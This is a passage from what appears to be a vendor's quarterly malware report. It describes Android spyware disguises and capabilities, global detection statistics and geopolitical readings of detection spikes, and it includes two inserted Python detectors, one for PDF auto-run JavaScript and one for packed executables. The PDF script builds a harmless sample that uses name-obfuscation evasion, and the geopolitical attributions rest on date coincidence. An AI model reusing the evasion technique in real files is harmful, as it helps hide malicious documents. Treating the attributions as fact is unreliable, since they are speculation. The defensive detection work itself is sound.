The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts their metadata and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has four different versions:

Version-1: Telegram Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version impersonates the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: it extracts SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable GPS services

Record audio and send it to the command and control server

Upload image files

Collect information about the applications installed

Collect browser data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of the previous versions, it has some extra tricks:

Extracts photos, audio and video

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it delivers a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp Message DB and related keys

Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contact details

Keep Wi-Fi always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable the Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users:

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:


Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send the USSD to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather information about installed applications

Send_call: set the Intent action to call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot:

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects the available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp

Here are some commands from its command and control server:

contacts: get contact details and email ID

Mute: set the action to mute

Mms: get MMS content

info: get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber

Version 2: Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can also block access to some apps and websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers to spread.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it keeps running in the background and starts its spying activity: it steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option; if you tap this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

The last one on our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Version-1 Netflix Hack Instagram Hack

Version-2 TSF Launcher

Version-3 Android Service PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is that possible? Imagine a cybercriminal who wants to infect her victims with a cryptominer to use their resources for mining cryptocurrency. She chooses CoinMiner for that purpose, downloads it and implants it on the victims' machines. However, she is not aware that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May



4.2.3 June 2018

Android-targeted malware in June



5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may use the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia suffered not just one p2p Worm outbreak but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led to the arrest of 10 people by the FBI for spreading banking malware via social networks.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common backdoor that Comodo detected in Q2 2018 was Dark Komet (DarkComet), a remote access trojan (RAT) that is fully 10 years old. It allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb", for Great Britain) was home to an astonishingly high proportion of Comodo backdoor detections in Q2.

The UK's backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for trojans according to Comodo detections.

And this timeline shows when this huge trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits

Computer exploits comprise software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target computer's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections are comparatively rare because the vulnerabilities they target are typically patched quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo targeted a favorite hacker target: Adobe Portable Document Format (PDF) files. The format was created in the 1990s to present documents consistently, independent of application software, hardware and operating system.

Japan and India were the two countries where Comodo detected the majority of exploit activity in Q2 2018, with Japan clearly experiencing the most persistent problem.
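Malicious PDFs almost always need two things: an action that runs automatically when the file is opened (/OpenAction or an /AA additional-action entry) and active content for it to trigger (/JavaScript, /Launch, an /EmbeddedFile). The triage script below is an added example, not code from the report; it scans a PDF for those names after undoing the two cheap evasions a grep-based check misses, namely PDF name hex escapes (/J#61vaScript is the same name as /JavaScript) and FlateDecode-compressed object streams. The sample documents it builds are constructed for the example and carry no real exploit, just an alert-box script.

```python
import re
import zlib

# PDF names that carry active content, and names that make the viewer run it on open.
ACTIVE_CONTENT = (b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile", b"/RichMedia")
AUTO_TRIGGERS = (b"/OpenAction", b"/AA")


def normalize_names(data: bytes) -> bytes:
    """Resolve PDF name hex escapes so that '/J#61vaScript' reads '/JavaScript'."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Return the file plus the decompressed body of every Flate-compressed stream,
    so keywords hidden inside compressed objects are visible to the scan."""
    inflated = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            inflated.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-encoded or corrupt: leave it to a full parser
    return data + b"\n" + b"\n".join(inflated)


def count_name(name: bytes, text: bytes) -> int:
    # The lookahead stops '/JS' from also matching longer names that start with it.
    return len(re.findall(re.escape(name) + rb"(?![A-Za-z])", text))


def triage_pdf(data: bytes) -> dict:
    """Classify a PDF as clean / review / suspicious from its active-content names."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF: missing %PDF- header")
    text = normalize_names(inflate_streams(data))
    hits = {n.decode(): count_name(n, text) for n in ACTIVE_CONTENT + AUTO_TRIGGERS}
    hits = {k: v for k, v in hits.items() if v}
    active = any(n.decode() in hits for n in ACTIVE_CONTENT)
    auto = any(n.decode() in hits for n in AUTO_TRIGGERS)
    if active and auto:
        verdict = "suspicious"   # active content wired to run when the file is opened
    elif active:
        verdict = "review"       # active content present but nothing found that auto-runs it
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits}


def _pdf(objects: list) -> bytes:
    """Assemble a minimal PDF body (constructed; no xref table, which triage does not need)."""
    body = b"%PDF-1.4\n"
    for i, obj in enumerate(objects, 1):
        body += b"%d 0 obj\n" % i + obj + b"\nendobj\n"
    return body + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


def build_malicious_pdf(obfuscate: bool) -> bytes:
    """Catalog whose OpenAction points at a JavaScript action with its code in a
    Flate-compressed stream. With obfuscate=True the names are hex-escaped."""
    js = zlib.compress(b"<< /S /JavaScript /JS (app.alert('constructed sample');) >>")
    open_action = b"/Open#41ction" if obfuscate else b"/OpenAction"
    js_name = b"/J#61vaScript" if obfuscate else b"/JavaScript"
    js_key = b"/J#53" if obfuscate else b"/JS"
    return _pdf([
        b"<< /Type /Catalog /Pages 2 0 R " + open_action + b" 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R >>",
        b"<< /S " + js_name + b" " + js_key + b" 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(js) + js + b"\nendstream",
    ])


def build_clean_pdf() -> bytes:
    return _pdf([
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>",
        b"<< /Length 16 >>\nstream\nBT (Hello) Tj ET\nendstream",
    ])


if __name__ == "__main__":
    print(triage_pdf(build_malicious_pdf(obfuscate=True)))
    print(triage_pdf(build_clean_pdf()))
```

This is a first-pass filter, not a parser: it reports names, not whether the referenced objects are reachable, and it does not decode filters other than Flate (LZW, ASCIIHex, ASCII85 or chained filters need a real PDF library). Treat "review" as a queue for a sandbox or an analyst rather than as a pass.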


5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructors

Constructors are applications that can be used to generate malware files automatically.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft rates this program as a "severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that this malware is likely a persistent threat to German networks.


5.3.2 Packers

"Packed" malware is malicious executable code that has been hidden or obfuscated by compressing ("packing") it inside a larger, seemingly innocuous executable or data stream; the hostile code can even be a script. The packed data is accompanied by a decompression stub (or is built as a self-extracting archive) that recreates the original code from the compressed form and then executes the malware. Encryption may also be layered on to conceal the malware from security software.

MUPX, a modified "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous file formats and operating systems; it uses the open-source UCL compression library, whose decompressor is only a few hundred bytes of code.

In Q2 2018 Russia was the #1 home of malware packers.

This timeline shows that Russia had the most persistent packer problem, while Iran had the highest periodic spikes.
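Stock UPX is easy to recognize: it names its sections UPX0, UPX1 and UPX2. A modified build can rename those sections, which is exactly why packer detection should not stop at names. Compressed or encrypted data has near-maximal byte entropy (close to 8 bits per byte), so measuring the Shannon entropy of each section's raw bytes still catches the renamed variant. The script below is an added example, not code from the report; it parses the PE section table with struct, scores each section, and exercises itself on three constructed images (stock-UPX-style names, renamed sections, and a plain one). The assumption that MUPX renames UPX's sections is the example's, not a statement from the report, and the "packed" payload is a random-byte stand-in for real compressed code.

```python
import math
import random
import struct

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}   # what stock UPX writes
ENTROPY_THRESHOLD = 7.0                        # bits/byte; compressed or encrypted data sits near 8.0
MIN_SECTION_BYTES = 256                        # entropy of a tiny section is noise


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant data, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Walk the PE section table (IMAGE_SECTION_HEADER, 40 bytes each) and yield (name, raw bytes)."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    num_sections, = struct.unpack_from("<H", image, e_lfanew + 6)      # COFF NumberOfSections
    size_of_optional, = struct.unpack_from("<H", image, e_lfanew + 20)  # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + size_of_optional
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), image[raw_ptr:raw_ptr + raw_size]


def analyze_pe(image: bytes) -> dict:
    """Combine the cheap name check with per-section entropy; either one marks the file as packed."""
    names, high = [], []
    for name, raw in pe_sections(image):
        names.append(name)
        if len(raw) >= MIN_SECTION_BYTES:
            h = shannon_entropy(raw)
            if h >= ENTROPY_THRESHOLD:
                high.append((name, round(h, 2)))
    upx_names = any(n in UPX_SECTION_NAMES for n in names)
    return {"sections": names, "upx_section_names": upx_names, "high_entropy_sections": high,
            "verdict": "packed" if (upx_names or high) else "not packed"}


def build_pe(sections) -> bytes:
    """Constructed minimal PE container: MZ stub, PE signature, COFF header with an empty
    optional header, then the section table and raw data. Not loadable; it only feeds the parser."""
    e_lfanew = 0x40
    hdr = bytearray(b"MZ".ljust(0x3C, b"\0")) + struct.pack("<I", e_lfanew)
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    data_off = len(hdr) + 40 * len(sections)
    table, raw = bytearray(), bytearray()
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0, len(data), data_off + len(raw), 0, 0, 0, 0, 0)
        raw += data
    return bytes(hdr + table + raw)


_rng = random.Random(2018)
PACKED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))        # stand-in for a compressed payload
PLAIN_CODE = b"\x55\x8b\xec\x83\xec\x10\x33\xc0\x5d\xc3" * 400        # repetitive x86 prologue/epilogue bytes

STOCK_UPX_IMAGE = build_pe([(b"UPX0", b"\0" * 64), (b"UPX1", PACKED_BLOB), (b".rsrc", b"\0" * 64)])
RENAMED_IMAGE = build_pe([(b".text", PACKED_BLOB), (b".data", b"\0" * 64)])   # assumed MUPX-style renaming
CLEAN_IMAGE = build_pe([(b".text", PLAIN_CODE), (b".data", b"\0" * 512)])

if __name__ == "__main__":
    for label, img in (("stock UPX", STOCK_UPX_IMAGE), ("renamed", RENAMED_IMAGE), ("clean", CLEAN_IMAGE)):
        print(label, analyze_pe(img))
```

Entropy alone also fires on legitimately compressed resources (embedded images, installers), so in practice the high-entropy verdict is a reason to unpack and look, not a conviction by itself.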


5.3.3 Email Flooders

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as spreading not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that modify or alter malicious files so that they evade detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period.

Such programs are typically labeled only a "medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nonetheless detects and flags them as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application category is alarming because users often install these programs inadvertently during ordinary computer and Internet activity. Examples include common adware, widely shared images and videos, dialers, jokes, gossip apps and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, change the search provider and/or perform other actions users may not have intended. Such programs include free toolbars, adware and "system optimizers".

As the bubble chart shows, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed together with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram also lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two Trojans, Kryptik and Zbot, that were the top detection not in one but in multiple verticals, which clearly makes them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was originally created to obtain information about an infected host's FTP servers but now also targets email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a Trojan "clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. The Zeus botnet has been described as one of the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.

In conclusion, Trojans are dangerous malware that can be found in every vertical and can be used for a wide variety of cyberattacks. Strategic analysis like this can be used to create a unique malware profile for each vertical and to provide cyber intelligence that clarifies the primary malware threats and focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out. What happened on that day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies around the world suddenly received a raft of new collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, and immediately set about fulfilling those requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo Trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was briefly more connected to the Internet than usual, or was trying to take advantage of a short period of political openness to connect with the outside world. Comodo researched the detected malware further and identified it as Windows activation ("cracking") software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware, because almost all activity, from social life to business, politics and national security, is now conducted online. This is especially true during a national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. This timeline provides an example: Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". This timeline, which shows Comodo's virus and Trojan detections in Belarus in Q2 2018, is consistent with that. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and Trojans. It is possible that the virus outbreak was used specifically to disseminate Trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context the massive spike in malware detections in Croatia on March 28 is interesting: it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity revealed that it took place almost exclusively in Vantaa, the city adjoining Helsinki that hosts the capital's international airport.


8 Conclusions

In Q2 Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

